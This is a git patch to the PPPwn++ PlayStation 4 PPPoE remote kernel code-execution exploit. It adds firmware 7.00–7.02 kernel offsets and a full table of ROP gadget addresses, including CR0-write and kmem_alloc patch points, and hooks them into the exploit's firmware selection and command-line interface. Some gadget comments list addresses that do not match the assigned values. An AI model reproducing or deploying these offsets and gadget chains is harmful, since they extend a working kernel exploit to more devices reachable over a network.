From 469101a775ae83d0cfb7475ffb2b42dcd9b7919f Mon Sep 17 00:00:00 2001 From: xfangfang <2553041586@qq.com> Date: Sat, 18 May 2024 02:07:24 +0800 Subject: [PATCH] Added PS4 7.00 7.01 7.02 Offsets (#3) https://github.com/TheOfficialFloW/PPPwn/pull/59 --- include/offset.h | 167 +++++++++++++++++++++++++++++++++++++---------- src/exploit.cpp | 3 + src/main.cpp | 20 +++--- 3 files changed, 148 insertions(+), 42 deletions(-) diff --git a/include/offset.h b/include/offset.h index 8bc4654..311c3bd 100644 --- a/include/offset.h +++ b/include/offset.h @@ -1,6 +1,7 @@ #pragma once enum FirmwareVersion { + FIRMWARE_700_702 = 700, FIRMWARE_750_755 = 750, FIRMWARE_800_803 = 800, FIRMWARE_850_852 = 850, @@ -15,43 +16,141 @@ enum FirmwareVersion { class OffsetsFirmware { public: - uint64_t PPPOE_SOFTC_LIST; - uint64_t KERNEL_MAP; - uint64_t SETIDT; - uint64_t KMEM_ALLOC; - uint64_t KMEM_ALLOC_PATCH1; - uint64_t KMEM_ALLOC_PATCH2; - uint64_t MEMCPY; - uint64_t MOV_CR0_RSI_UD2_MOV_EAX_1_RET; - uint64_t SECOND_GADGET_OFF; - uint64_t FIRST_GADGET; - uint64_t PUSH_RBP_JMP_QWORD_PTR_RSI; - uint64_t POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10; - uint64_t LEA_RSP_RSI_20_REPZ_RET; - uint64_t ADD_RSP_28_POP_RBP_RET; - uint64_t ADD_RSP_B0_POP_RBP_RET; - uint64_t RET; - uint64_t POP_RDI_RET; - uint64_t POP_RSI_RET; - uint64_t POP_RDX_RET; - uint64_t POP_RCX_RET; - uint64_t POP_R8_POP_RBP_RET; - uint64_t POP_R12_RET; - uint64_t POP_RAX_RET; - uint64_t POP_RBP_RET; - uint64_t PUSH_RSP_POP_RSI_RET; - uint64_t MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX; - uint64_t MOV_BYTE_PTR_RCX_AL_RET; - uint64_t MOV_RDI_RBX_CALL_R12; - uint64_t MOV_RDI_R14_CALL_R12; - uint64_t MOV_RSI_RBX_CALL_RAX; - uint64_t MOV_R14_RAX_CALL_R8; - uint64_t ADD_RDI_RCX_RET; - uint64_t SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET; - uint64_t JMP_R14; + uint64_t PPPOE_SOFTC_LIST{}; + uint64_t KERNEL_MAP{}; + uint64_t SETIDT{}; + uint64_t KMEM_ALLOC{}; + uint64_t KMEM_ALLOC_PATCH1{}; + uint64_t KMEM_ALLOC_PATCH2{}; + uint64_t MEMCPY{}; + uint64_t MOV_CR0_RSI_UD2_MOV_EAX_1_RET{}; + uint64_t SECOND_GADGET_OFF{}; + uint64_t FIRST_GADGET{}; + uint64_t PUSH_RBP_JMP_QWORD_PTR_RSI{}; + uint64_t POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10{}; + uint64_t LEA_RSP_RSI_20_REPZ_RET{}; + uint64_t ADD_RSP_28_POP_RBP_RET{}; + uint64_t ADD_RSP_B0_POP_RBP_RET{}; + uint64_t RET{}; + uint64_t POP_RDI_RET{}; + uint64_t POP_RSI_RET{}; + uint64_t POP_RDX_RET{}; + uint64_t POP_RCX_RET{}; + uint64_t POP_R8_POP_RBP_RET{}; + uint64_t POP_R12_RET{}; + uint64_t POP_RAX_RET{}; + uint64_t POP_RBP_RET{}; + uint64_t PUSH_RSP_POP_RSI_RET{}; + uint64_t MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX{}; + uint64_t MOV_BYTE_PTR_RCX_AL_RET{}; + uint64_t MOV_RDI_RBX_CALL_R12{}; + uint64_t MOV_RDI_R14_CALL_R12{}; + uint64_t MOV_RSI_RBX_CALL_RAX{}; + uint64_t MOV_R14_RAX_CALL_R8{}; + uint64_t ADD_RDI_RCX_RET{}; + uint64_t SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET{}; + uint64_t JMP_R14{}; }; +/// FW 7.00 / 7.01 / 7.02 +class OffsetsFirmware_700_702: public OffsetsFirmware { +public: + OffsetsFirmware_700_702() { + PPPOE_SOFTC_LIST = 0xffffffff844ad838; + + KERNEL_MAP = 0xffffffff843c8ee0; + + SETIDT = 0xffffffff82692400; + + KMEM_ALLOC = 0xffffffff823170f0; + KMEM_ALLOC_PATCH1 = 0xffffffff823171be; + KMEM_ALLOC_PATCH2 = 0xffffffff823171c6; + + MEMCPY = 0xffffffff8222ef80; + + // 0xffffffff82660609 : mov cr0, rsi ; ud2 ; mov eax, 1 ; ret + MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823b7169; + + SECOND_GADGET_OFF = 0x3b; + + // 0xffffffff822f52ed : jmp qword ptr [rsi + 0x3b] + FIRST_GADGET = 0xffffffff822f52ed; + + // 0xffffffff82c72e66 : push rbp ; jmp qword ptr [rsi] + PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c928d6; + + // 0xffffffff82699bc1 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] + POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff82699bc1; + + // 0xffffffff82945dc6 : lea rsp, [rsi + 0x20] ; repz ret + LEA_RSP_RSI_20_REPZ_RET = 0xffffffff82945dc6; + + // 0xffffffff826d56ad : add rsp, 0x28 ; pop rbp ; ret + ADD_RSP_28_POP_RBP_RET = 0xffffffff826d56ad; + + // 0xffffffff8252a48a : add rsp, 0xb0 ; pop rbp ; ret + ADD_RSP_B0_POP_RBP_RET = 0xffffffff8252a48a; + + // 0xffffffff822005a1 : ret + RET = 0xffffffff822005a1; + + // 0xffffffff8255325a : pop rdi ; ret + POP_RDI_RET = 0xffffffff8255325a; + + // 0xffffffff8230d34e : pop rsi ; ret + POP_RSI_RET = 0xffffffff8230d34e; + + // 0xffffffff8299ae06 : pop rdx ; ret + POP_RDX_RET = 0xffffffff8299ae06; + + // 0xffffffff822563a6 : pop rcx ; ret + POP_RCX_RET = 0xffffffff822563a6; + + // 0xffffffff82326dcd : pop r8 ; pop rbp ; ret + POP_R8_POP_RBP_RET = 0xffffffff82326dcd; + + // 0xffffffff827d2b4f : pop r12 ; ret + POP_R12_RET = 0xffffffff827d2b4f; + + // 0xffffffff82407b54 : pop rax ; ret + POP_RAX_RET = 0xffffffff82407b54; + + // 0xffffffff822008f2 : pop rbp ; ret + POP_RBP_RET = 0xffffffff822008f2; + + // 0xffffffff82bd348a : push rsp ; pop rsi ; ret + PUSH_RSP_POP_RSI_RET = 0xffffffff82bd348a; + + // 0xffffffff822fb490 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax + MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff822fb490; + + // 0xffffffff82b910ba : mov byte ptr [rcx], al ; ret + MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff82b910ba; + + // 0xffffffff82644739 : mov rdi, rbx ; call r12 + MOV_RDI_RBX_CALL_R12 = 0xffffffff82644739; + + // 0xffffffff82644535 : mov rdi, r14 ; call r12 + MOV_RDI_R14_CALL_R12 = 0xffffffff82644535; + + // 0xffffffff822ad8e1 : mov rsi, rbx ; call rax + MOV_RSI_RBX_CALL_RAX = 0xffffffff822ad8e1; + + // 0xffffffff8266a598 : mov r14, rax ; call r8 + MOV_R14_RAX_CALL_R8 = 0xffffffff8266a598; + + // 0xffffffff82cd2aca : add rdi, rcx ; ret + ADD_RDI_RCX_RET = 0xffffffff82cd2aca; + + // 0xffffffff82583b8a : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret + SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82583b8a; + + // 0xffffffff82ba226b : jmp r14 + JMP_R14 = 0xffffffff82ba226b; + } +}; + /// FW 7.50 / 7.51 / 7.50 class OffsetsFirmware_750_755 : public OffsetsFirmware { public: diff --git a/src/exploit.cpp b/src/exploit.cpp index fe9116c..164a3a6 100644 --- a/src/exploit.cpp +++ b/src/exploit.cpp @@ -132,6 +132,9 @@ LcpEchoHandler::~LcpEchoHandler() { int Exploit::setFirmwareVersion(FirmwareVersion version) { switch (version) { + case FirmwareVersion::FIRMWARE_700_702: + this->offs = OffsetsFirmware_700_702(); + break; case FirmwareVersion::FIRMWARE_750_755: this->offs = OffsetsFirmware_750_755(); break; diff --git a/src/main.cpp b/src/main.cpp index 0b86a43..8e488c5 100644 --- a/src/main.cpp +++ b/src/main.cpp @@ -112,6 +112,9 @@ void listInterfaces() { enum FirmwareVersion getFirmwareOffset(int fw) { std::unordered_map fw_choices = { + {700, FIRMWARE_700_702}, + {701, FIRMWARE_700_702}, + {702, FIRMWARE_700_702}, {750, FIRMWARE_750_755}, {750, FIRMWARE_750_755}, {751, FIRMWARE_750_755}, @@ -138,6 +141,8 @@ enum FirmwareVersion getFirmwareOffset(int fw) { return fw_choices[fw]; } +#define SUPPORTED_FIRMWARE "{700,701,702,750,751,755,800,801,803,850,852,900,903,904,950,951,960,1000,1001,1050,1070,1071,1100}" + int main(int argc, char *argv[]) { using namespace clipp; std::cout << "[+] PPPwn++ - PlayStation 4 PPPoE RCE by theflow" << std::endl; @@ -146,14 +151,13 @@ int main(int argc, char *argv[]) { bool retry = false; auto cli = ( - (required("--interface").doc("network interface") & value("interface", interface), - option("--fw").doc( - "{750,751,755,800,801,803,850,852,900,903,904,950,951,960,1000,1001,1050,1070,1071,1100}") & - integer("fw", fw), - option("--stage1").doc("stage1 binary") & value("STAGE1", stage1), - option("--stage2").doc("stage2 binary") & value("STAGE2", stage2), - option("-a", "--auto-retry").doc("automatically retry when fails").set(retry) - ) | command("list").doc("list interfaces").call(listInterfaces) + ("network interface" % required("--interface") & value("interface", interface), \ + SUPPORTED_FIRMWARE % option("--fw") & integer("fw", fw), \ + "stage1 binary" % option("--stage1") & value("STAGE1", stage1), \ + "stage2 binary" % option("--stage2") & value("STAGE2", stage2), \ + "automatically retry when fails" % option("-a", "--auto-retry").set(retry) + ) | \ + "list interfaces" % command("list").call(listInterfaces) ); auto result = parse(argc, argv, cli);